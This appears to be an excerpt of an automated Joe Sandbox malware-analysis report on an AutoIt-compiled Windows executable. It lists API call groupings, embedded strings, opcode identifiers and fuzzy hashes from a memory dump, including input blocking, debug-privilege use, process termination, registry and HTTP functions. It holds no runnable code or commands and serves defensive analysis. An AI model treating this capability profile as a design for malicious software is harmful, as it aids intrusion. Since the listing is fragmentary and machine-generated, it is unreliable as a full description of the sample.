                                                                                          • API ID: Find$CloseFileFirst
                                                                                          • String ID:
                                                                                          • API String ID: 2295610775-0
                                                                                          Similarity
                                                                                          • API ID: ErrorFormatLastMessage
                                                                                          • String ID:
                                                                                          • API String ID: 3479602957-0
                                                                                          Similarity
                                                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                                                          • String ID:
                                                                                          • API String ID: 81990902-0
                                                                                          Similarity
                                                                                          • API ID: BlockInput
                                                                                          • String ID:
                                                                                          • API String ID: 3456056419-0
                                                                                          Similarity
                                                                                          • API ID: NameUser
                                                                                          • String ID:
                                                                                          • API String ID: 2645101109-0
                                                                                          Similarity
                                                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                          • String ID:
                                                                                          • API String ID: 3521893082-0
                                                                                          Similarity
                                                                                          • API ID: ErrorMode$DriveType
                                                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                          • API String ID: 2907320926-4222207086
                                                                                          Similarity
                                                                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                          • String ID:
                                                                                          • API String ID: 1996641542-0
                                                                                          Similarity
                                                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                          • String ID: tooltips_class32
                                                                                          • API String ID: 698492251-1918224756
                                                                                          Similarity
                                                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                          • String ID: @
                                                                                          • API String ID: 3869813825-2766056989
                                                                                          Similarity
                                                                                          • API ID: Color$LongWindow$ModeObjectStockText
                                                                                          • String ID:
                                                                                          • API String ID: 554392163-0
                                                                                          Similarity
                                                                                          • API ID: wcscat$FileInfoQueryValueVersion$Sizewcscpywcsstr
                                                                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                          • API String ID: 222038402-1459072770
                                                                                          Similarity
                                                                                          • API ID: BuffCharMessageSendUpper
                                                                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                          • API String ID: 3974292440-4258414348
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreenwcscat
                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                          • API String ID: 2091158083-3440237614
                                                                                          Similarity
                                                                                          • API ID: SendString$BuffCharDriveLowerType
                                                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                          • API String ID: 1600147383-4113822522
                                                                                          Similarity
                                                                                          • API ID: Load$Image$IconLibraryMessageSend_invalid_parameter_noinfo$DestroyExtractFree
                                                                                          • String ID: .dll$.exe$.icl
                                                                                          • API String ID: 258715311-1154884017
                                                                                          Similarity
                                                                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                          • String ID:
                                                                                          • API String ID: 3840717409-0
                                                                                          Similarity
                                                                                          • API ID: Variant$ClearInit
                                                                                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                          • API String ID: 2610073882-3931177956
                                                                                          Similarity
                                                                                          • API ID: Filewcscat$DeleteTemp$NamePath_fread_nolock_invalid_parameter_noinfowcscpy
                                                                                          • String ID: aut
                                                                                          • API String ID: 130057722-3010740371
                                                                                          Similarity
                                                                                          • API ID: Window$MessageSend$CreateDestroy$DesktopRect
                                                                                          • String ID: tooltips_class32
                                                                                          • API String ID: 2443926738-1918224756
                                                                                          Similarity
                                                                                          • API ID: CurrentDirectoryTime$File$Localwcscat$Systemwcscpy
                                                                                          • String ID: *.*
                                                                                          • API String ID: 1111067124-438819550
                                                                                          Similarity
                                                                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                          • String ID:
                                                                                          • API String ID: 2598888154-3916222277
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                          • String ID: NULL Pointer assignment
                                                                                          • API String ID: 2706829360-2785691316
                                                                                          APIs
                                                                                          • CharUpperBuffW.USER32(?,?,?,00000000,?,?,?,00007FF74D0CFD7B), ref: 00007FF74D0D1143
                                                                                          Similarity
                                                                                          • API ID: BuffCharUpper
                                                                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                          • API String ID: 3964851224-909552448
                                                                                          Similarity
                                                                                          • API ID: CurrentDirectory$AttributesFilewcscat$wcscpy
                                                                                          • String ID: *.*
                                                                                          • API String ID: 4125642244-438819550
                                                                                          Similarity
                                                                                          • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                          • String ID: P
                                                                                          • API String ID: 1460738036-3110715001
                                                                                          Similarity
                                                                                          • API ID: LoadStringwprintf
                                                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                          • API String ID: 3297454147-3080491070
                                                                                          Similarity
                                                                                          • API ID: HandleLoadModuleString$Messagewprintf
                                                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                          • API String ID: 4051287042-2268648507
                                                                                          Similarity
                                                                                          • API ID: Thread$Window$CurrentMessageProcessSendSleep$ActiveAttachDialogEnumFindInputTimeWindowstime
                                                                                          • String ID: BUTTON
                                                                                          • API String ID: 3935177441-3405671355
                                                                                          Similarity
                                                                                          • API ID: Destroy$AcceleratorKillTableTimerWindow
                                                                                          • String ID:
                                                                                          • API String ID: 1974058525-0
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Similarity
                                                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                                                          • String ID:
                                                                                          • API String ID: 3096461208-0
                                                                                          Similarity
                                                                                          • API ID: State$Async$Keyboard
                                                                                          • String ID:
                                                                                          • API String ID: 541375521-0
                                                                                          Similarity
                                                                                          • API ID: BuffCharDriveLowerTypewcscpy
                                                                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                          • API String ID: 1561581874-1000479233
                                                                                          Similarity
                                                                                          • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
                                                                                          • String ID: %s%u
                                                                                          • API String ID: 1412819556-679674701
                                                                                          Similarity
                                                                                          • API ID: ClassName$Window$Text$BuffCharRectUpperwcsstr
                                                                                          • String ID: ThumbnailClass
                                                                                          • API String ID: 4010642439-1241985126
                                                                                          Similarity
                                                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                          • String ID: P
                                                                                          • API String ID: 1268354404-3110715001
                                                                                          Similarity
                                                                                          • API ID: LoadStringwprintf
                                                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                          • API String ID: 3297454147-2391861430
                                                                                          Similarity
                                                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
                                                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                          • API String ID: 3030280669-22481851
                                                                                          Similarity
                                                                                          • API ID: Window$CreateMessageObjectSend$AttributesCompatibleDeleteDestroyLayeredLongMovePixelSelectStock
                                                                                          • String ID: static
                                                                                          • API String ID: 3821898125-2160076837
                                                                                          Similarity
                                                                                          • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                          • String ID:
                                                                                          • API String ID: 1255039815-0
                                                                                          Similarity
                                                                                          • API ID: State$Async$Keyboard
                                                                                          • String ID:
                                                                                          • API String ID: 541375521-0
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF74D036838: CreateFileW.KERNELBASE ref: 00007FF74D0368A2
                                                                                            • Part of subcall function 00007FF74D054380: GetCurrentDirectoryW.KERNEL32(?,00007FF74D03E817), ref: 00007FF74D05439C
                                                                                            • Part of subcall function 00007FF74D0356D4: GetFullPathNameW.KERNEL32(?,00007FF74D0356C1,?,00007FF74D037A0C,?,?,?,00007FF74D03109E), ref: 00007FF74D0356FF
                                                                                          • SetCurrentDirectoryW.KERNEL32 ref: 00007FF74D03E8B0
                                                                                          • SetCurrentDirectoryW.KERNEL32 ref: 00007FF74D03E9FA
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: CurrentDirectory$CreateFileFullNamePathwcscpy
                                                                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                          • API String ID: 2207129308-1018226102
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                          • API String ID: 636576611-1287834457
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: Icmp$CleanupCloseCreateEchoFileHandleSendStartupgethostbynameinet_addr
                                                                                          • String ID: 5$Ping
                                                                                          • API String ID: 1486594354-1972892582
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                          • API String ID: 3215553584-2617248754
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: HandleLoadMessageModuleStringwprintf
                                                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                          • API String ID: 4007322891-4153970271
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: MessageSend$CtrlParent$ClassName
                                                                                          • String ID: ComboBox$ListBox
                                                                                          • API String ID: 2573188126-1403004172
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: MessageSend$CtrlParent$ClassName
                                                                                          • String ID: ComboBox$ListBox
                                                                                          • API String ID: 2573188126-1403004172
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: wcscpy$CleanupStartupgethostbynamegethostnameinet_ntoa
                                                                                          • String ID: 0.0.0.0
                                                                                          • API String ID: 2479661705-3771769585
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: ItemMenu$InfoWindow$CheckCountCtrlEnabledFocusLongMessagePostProcRadio
                                                                                          • String ID:
                                                                                          • API String ID: 2672075419-0
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                          • String ID:
                                                                                          • API String ID: 2156557900-0
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Virtual$MessagePostSleepThread$AttachCurrentInputProcessWindow
                                                                                          • String ID:
                                                                                          • API String ID: 685491774-0
                                                                                          • Opcode ID: 218ae80792710925bb17cb5ea99adcd606458d8e9e9d8c7235401f523141f2b8
                                                                                          • Instruction ID: bd53fe7e03560877725ed90cbbfb4e82bbb2dbd18dd0d4e101dec78cc59f2374
                                                                                          • Opcode Fuzzy Hash: 218ae80792710925bb17cb5ea99adcd606458d8e9e9d8c7235401f523141f2b8
                                                                                          • Instruction Fuzzy Hash: 2E11A235F0C54AC2F724BB76E85C66E6261AFCCB80F805838C99E4BB64EE3DD4548360
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                          • API String ID: 0-1603158881
                                                                                          • Opcode ID: 29975b3c2b9711d51f2a34939379774d20c8c5231b4f57784e2d79393856af5d
                                                                                          • Instruction ID: 1321dcec4fbfbff96ef9d5ddfdda9cc50725845b1cb6f20266036041c1ec8e6b
                                                                                          • Opcode Fuzzy Hash: 29975b3c2b9711d51f2a34939379774d20c8c5231b4f57784e2d79393856af5d
                                                                                          • Instruction Fuzzy Hash: CB12CE62F1D643D2EA68BB20C8112F9E692BF56784FD44572DA9D872A1FF7CE5408220
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: Variant$Init$Clear
                                                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
                                                                                          • API String ID: 3467423407-1765764032
                                                                                          • Opcode ID: 0d292a3f0f15bdf0dc2b489c3a05645491a3d66a64ca4070d3452dd040457e0f
                                                                                          • Instruction ID: 1ef84c10e26535b3517dbbcf1d566fdf5e656f95171d8eb89b7064a804c31a65
                                                                                          • Opcode Fuzzy Hash: 0d292a3f0f15bdf0dc2b489c3a05645491a3d66a64ca4070d3452dd040457e0f
                                                                                          • Instruction Fuzzy Hash: CBA17A36A0CB42C6EB24BB65E4406ADA7A0FB89B98F940136DE8D03B64EF7CD445C750
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Window$CreateObjectStockwcscat
                                                                                          • String ID: -----$SysListView32
                                                                                          • API String ID: 2361508679-3975388722
                                                                                          • Opcode ID: c344d9879c390065c59b29320dac7b0039891542bbecba4ba3e0f02e7f9bfa97
                                                                                          • Instruction ID: 75ffd441e5f87c02c1f01cb659235420d02c76f208b2bff1eeeb3417c5bbc087
                                                                                          • Opcode Fuzzy Hash: c344d9879c390065c59b29320dac7b0039891542bbecba4ba3e0f02e7f9bfa97
                                                                                          • Instruction Fuzzy Hash: 50519232A08791CAE720EF25E8486DD73A1FB88784F80413AEE9D47B65DF39D555CB40
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: ClassMessageNameParentSend_invalid_parameter_noinfo
                                                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                          • API String ID: 2019164449-3381328864
                                                                                          • Opcode ID: 85bc50b5cb3f1aae72e6251db0d1ce00868677b2ce09b4091907517111ac15a9
                                                                                          • Instruction ID: 9526b4bd8f23c914827737ea2d51d2d0f1b3505af0f1089dc011d693c9428407
                                                                                          • Opcode Fuzzy Hash: 85bc50b5cb3f1aae72e6251db0d1ce00868677b2ce09b4091907517111ac15a9
                                                                                          • Instruction Fuzzy Hash: DF214F21F1D547C0FA60FB11E95927AA362AF86784F918035CD8E476B6FE2CE5168B20
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: FreeString$FileFromLibraryModuleNamePathQueryType
                                                                                          • String ID:
                                                                                          • API String ID: 1903627254-0
                                                                                          • Opcode ID: 598b5a242d4ad7e8ea74ab1cb47f7436f773884321b066f1e5bf024af7697886
                                                                                          • Instruction ID: ab4ca5337d069e72379d4cdd4105f4b57ad18415a86722afd82a0f4ede9dd82a
                                                                                          • Opcode Fuzzy Hash: 598b5a242d4ad7e8ea74ab1cb47f7436f773884321b066f1e5bf024af7697886
                                                                                          • Instruction Fuzzy Hash: A0022A62A0CA86C6DB54EF29D4442ADA760FBC5F94F905032EA8E07B74EF7CD549C710
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                          • String ID:
                                                                                          • API String ID: 3210457359-0
                                                                                          • Opcode ID: 33ab6cce80c9e0840b45516de4cf550524ae496078474d2d7534a7033dd0db45
                                                                                          • Instruction ID: 8ee980c7f418702f386b353e6a9c27ac73a5885548a5a68a2abc16f28ca604ea
                                                                                          • Opcode Fuzzy Hash: 33ab6cce80c9e0840b45516de4cf550524ae496078474d2d7534a7033dd0db45
                                                                                          • Instruction Fuzzy Hash: 9861E521A0C643C6FB34FE2594647B99221BF88794F904132DAAE036F5EE7DE4809324
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                          • String ID:
                                                                                          • API String ID: 1957940570-0
                                                                                          • Opcode ID: 67bda6fc94471c3762a54e3e67296020613b076a2f011637c0efff71f078e81c
                                                                                          • Instruction ID: fff21090d21e7449f5d55fecf016eabad28165f7438a3c3bec542c1b96cff9d9
                                                                                          • Opcode Fuzzy Hash: 67bda6fc94471c3762a54e3e67296020613b076a2f011637c0efff71f078e81c
                                                                                          • Instruction Fuzzy Hash: 1621287291DB85C2EB10AF52E44C36AB7A0F789FDAF844529DA8D07B64DF7CD1488B10
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageReleaseScreenSendText
                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                          • API String ID: 3721556410-2107944366
                                                                                          • Opcode ID: 587eb60e7772e36f3e392801f2e4a607ca3d480d8a76847679925989c46b6468
                                                                                          • Instruction ID: 8776cf7536f0c51349e787b59fa1f73cfcb25e5241b662046ed7669edf9bac48
                                                                                          • Opcode Fuzzy Hash: 587eb60e7772e36f3e392801f2e4a607ca3d480d8a76847679925989c46b6468
                                                                                          • Instruction Fuzzy Hash: 6761AD32B1CA56CAEB00FB61E8845EDB770FB48B98F910132ED5D13AA5EE39E445C750
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                          • String ID: SeDebugPrivilege
                                                                                          • API String ID: 2533919879-2896544425
                                                                                          • Opcode ID: 4f21c35d0a4ac780837a5a8e5dc6f68c18b89875e417af61e1445dd9dd8e1fe8
                                                                                          • Instruction ID: d0721f65a13fe7215dc085a24ca186556ecebe27d9dc3fdeafaff8ff370e65b1
                                                                                          • Opcode Fuzzy Hash: 4f21c35d0a4ac780837a5a8e5dc6f68c18b89875e417af61e1445dd9dd8e1fe8
                                                                                          • Instruction Fuzzy Hash: 6A518F62A0C682C2EB04FB65C59437CAB60FF84B81F858835D68D077B2EF7CE4048720
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                          • String ID: 2$P
                                                                                          • API String ID: 93392585-1110268094
                                                                                          • Opcode ID: 46a49604fdc7cbe7f64919669a233ff3b62d38c72d86d24d888cad9356e87a30
                                                                                          • Instruction ID: 5e2c4fe5d237c730ce82d1fc08c9cfc5fa16e3a88b100f70571b3f4cde4318e7
                                                                                          • Opcode Fuzzy Hash: 46a49604fdc7cbe7f64919669a233ff3b62d38c72d86d24d888cad9356e87a30
                                                                                          • Instruction Fuzzy Hash: 6151C132E0C642C9F760BF65E4442BDB7A1BB64758FA44136CA9A137E4EF39E4918730
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: Window$LongMessageSend$Show
                                                                                          • String ID: '
                                                                                          • API String ID: 257662517-1997036262
                                                                                          • Opcode ID: eb894a93846cd46a5342e3ebb468783be677627f1867a2ee8fe2f5b975b70651
                                                                                          • Instruction ID: fc62362a34a425d32110fcf35a5c018adbcef0aa2146033d156d6b10fb53728f
                                                                                          • Opcode Fuzzy Hash: eb894a93846cd46a5342e3ebb468783be677627f1867a2ee8fe2f5b975b70651
                                                                                          • Instruction Fuzzy Hash: 9351D732A0C646C1E364FB66A46C6BDA751FB85B90F944533DEEE037A0EE3DE4418710
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: IconLoad_invalid_parameter_noinfo
                                                                                          • String ID: blank$info$question$stop$warning
                                                                                          • API String ID: 4060274358-404129466
                                                                                          • Opcode ID: a20ad64d4c1f0ff606b53834bd72c3c9b388472799770000db1625183137431d
                                                                                          • Instruction ID: e7e615bfd744db8b7ce5bb7fc9488123a9d4f21130a775b9a45bf3f53be8dade
                                                                                          • Opcode Fuzzy Hash: a20ad64d4c1f0ff606b53834bd72c3c9b388472799770000db1625183137431d
                                                                                          • Instruction Fuzzy Hash: 6E215925A0C783C1EA64FB16A9011BAE369AF98780FD55031DD8E077A5FE7CE8018720
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: HandleLoadModuleString$Messagewprintf
                                                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                                                          • API String ID: 4051287042-3128320259
                                                                                          • Opcode ID: f7e86a73b67135bbf4198df281c36ffde702979d794fcff8f2d08bb660d9317c
                                                                                          • Instruction ID: 1ac4914101872016f52dac01f4b09c4dcf362407a7c0ebb95ed999c4987fde92
                                                                                          • Opcode Fuzzy Hash: f7e86a73b67135bbf4198df281c36ffde702979d794fcff8f2d08bb660d9317c
                                                                                          • Instruction Fuzzy Hash: 7F11707561CA89D1D724BB20F4487EAA360FB9C744FC0443ADA8E43B68EE7CC145C720
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                          • String ID:
                                                                                          • API String ID: 1211466189-0
                                                                                          • Opcode ID: e4483054fe90d725006c88ea8490581a4df116f0e1f8785d266180591fe398c1
                                                                                          • Instruction ID: df055ae1a037e0d87c2ff2c06a279ef5798ffc62e7bfca7f4494ff0c11947162
                                                                                          • Opcode Fuzzy Hash: e4483054fe90d725006c88ea8490581a4df116f0e1f8785d266180591fe398c1
                                                                                          • Instruction Fuzzy Hash: 6DA1066271C687C2EB68BF359154779B7A0FB88B44F505139DE8A43AA0EF3CE8518750
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: Close$BuffCharConnectDeleteOpenRegistryUpperValue
                                                                                          • String ID:
                                                                                          • API String ID: 50796853-0
                                                                                          • Opcode ID: f5a1a67ecd9b101a11fc5f9cb9367f83b4f1b47b2c9f0c1f4c44b8d49d3bc558
                                                                                          • Instruction ID: ba14311f7abfc9489152f12ed9759286579ec52825a44dcd38e6b6aa3665f30f
                                                                                          • Opcode Fuzzy Hash: f5a1a67ecd9b101a11fc5f9cb9367f83b4f1b47b2c9f0c1f4c44b8d49d3bc558
                                                                                          • Instruction Fuzzy Hash: 76B16022B0DA42C6EB10FF65D5943BCAB60EF45B84F804432DA8E57AA6EF78D105C764
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: ShowWindow
                                                                                          • String ID:
                                                                                          • API String ID: 1268545403-0
                                                                                          • Opcode ID: cc21e6db9a044589e755c4703016b6e1d9c57170080a8525f9bf3d2d7d54c8f4
                                                                                          • Instruction ID: 0ddeaa1579851f0871c191afd94adfb3cda919e6b5e37eaa2e6917fec9e1a57c
                                                                                          • Opcode Fuzzy Hash: cc21e6db9a044589e755c4703016b6e1d9c57170080a8525f9bf3d2d7d54c8f4
                                                                                          • Instruction Fuzzy Hash: 3651D731E4C182C9FB64FB2494683BDA6969F86B08F994071DDCE036F5EE6CE484C661
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                          • String ID:
                                                                                          • API String ID: 3864802216-0
                                                                                          • Opcode ID: 51e6ec7aa37fc3003482106919c843e152de56e0f8813b4e66b1a7a4e18ad1cb
                                                                                          • Instruction ID: d86fe89fbaf2d3dd5578fe20564e9e51da2e32cf74c93a9639a4ad1d2bd6be00
                                                                                          • Opcode Fuzzy Hash: 51e6ec7aa37fc3003482106919c843e152de56e0f8813b4e66b1a7a4e18ad1cb
                                                                                          • Instruction Fuzzy Hash: 92418C7661C681C7E724AF21B458B6ABBA0F789B91F504135EFDA47B64EF3CD4408B00
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 3215553584-0
                                                                                          • Opcode ID: c2757373dfb26c044112a110afa25e05e956175428925470acde8015b00b00d1
                                                                                          • Instruction ID: bfe4646e8f5748316e0660580e26545a6da5ba4b46a91e7a249d10152e535499
                                                                                          • Opcode Fuzzy Hash: c2757373dfb26c044112a110afa25e05e956175428925470acde8015b00b00d1
                                                                                          • Instruction Fuzzy Hash: 4BC1E622B0C782C5EA60BF95941427DEB61AF54B80FD55235EACE0B7F5EE3CE8418721
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                          • String ID:
                                                                                          • API String ID: 2550207440-0
                                                                                          • Opcode ID: 00c2af4dc047eb3328d9db7280bab1605e51150c83bde12361ed7da654b6a987
                                                                                          • Instruction ID: 6a729460a84ce483f121516e791099017299c9e3b1ace2682a7833fc464c07f0
                                                                                          • Opcode Fuzzy Hash: 00c2af4dc047eb3328d9db7280bab1605e51150c83bde12361ed7da654b6a987
                                                                                          • Instruction Fuzzy Hash: DBA19C22B0C616C5FB50FBA5C4943BCA760EB45B84F954431DE8D972A6EFBCE441C360
                                                                                          Similarity
                                                                                          • API ID: ObjectSelect$BeginCreatePath
                                                                                          • String ID:
                                                                                          • API String ID: 3225163088-0
                                                                                          • Opcode ID: e150efe4bbb5a68fe2f4df4e615a944ed6587934d7859263685a3daad39b8607
                                                                                          • Instruction ID: b52afbd0bfb219e3ca5aa8c7172dd940ec1e1acae393b71288ef09b68bf7171a
                                                                                          • Opcode Fuzzy Hash: e150efe4bbb5a68fe2f4df4e615a944ed6587934d7859263685a3daad39b8607
                                                                                          • Instruction Fuzzy Hash: 41A19C72A0C6C0C7D764AF19A4046AEFB75FB89B94F904125EAC917B68DB3CD442CF10
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: MessageSendWindow$Enabled
                                                                                          • String ID:
                                                                                          • API String ID: 3694350264-0
                                                                                          Similarity
                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                          • String ID:
                                                                                          • API String ID: 87235514-0
                                                                                          Similarity
                                                                                          • API ID: Internet$CloseConnectErrorEventHandleHttpLastOpenRequest
                                                                                          • String ID:
